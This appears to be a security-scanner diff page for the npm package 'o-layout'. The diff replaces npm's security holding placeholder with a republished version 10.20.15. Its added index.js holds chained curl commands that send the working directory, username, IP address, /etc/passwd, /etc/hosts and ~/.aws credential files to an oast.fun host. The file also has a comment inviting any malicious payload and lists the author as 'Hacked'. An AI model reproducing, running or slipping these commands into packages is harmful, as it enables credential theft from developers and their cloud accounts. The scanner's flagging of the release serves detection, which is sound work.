o-layout 0.0.1-security → 10.20.15
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of o-layout might be problematic. Click here for more details.
- package/index.js +3 -0
- package/package.json +12 -4
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
1
|
+
// index.js
|
|
2
|
+
console.log('curl trorhynkyxpagtxaggktdcdrht4vyd0kh.oast.fun/pwd=$(pwd) && curl trorhynkyxpagtxaggktdcdrht4vyd0kh.oast.fun/whoami=$(whoami)&&curl trorhynkyxpagtxaggktdcdrht4vyd0kh.oast.fun/package=$(echo "o-layout") && curl trorhynkyxpagtxaggktdcdrht4vyd0kh.oast.fun/ip=$(curl ifconfig.me)&& curl -X POST -d "data=$(cat /etc/passwd ;cat /etc/hosts)" trorhynkyxpagtxaggktdcdrht4vyd0kh.oast.fun/hostname=$(hostname) && curl -X POST -d "data=$(cd;ls -la;cat .aws/*)" trorhynkyxpagtxaggktdcdrht4vyd0kh.oast.fun');
|
|
3
|
+
// Add any malicious payload here that you wanted
|
package/package.json
CHANGED
|
@@ -1,6 +1,14 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "o-layout",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
6
|
-
|
|
3
|
+
"version": "10.20.15",
|
|
4
|
+
"main": "index.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"start": "node index.js"
|
|
7
|
+
},
|
|
8
|
+
"author": "Hacked",
|
|
9
|
+
"license": "ISC",
|
|
10
|
+
"dependencies": {
|
|
11
|
+
"lodash": "^4.17.21"
|
|
12
|
+
},
|
|
13
|
+
"description": ""
|
|
14
|
+
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=o-layout for more information.
|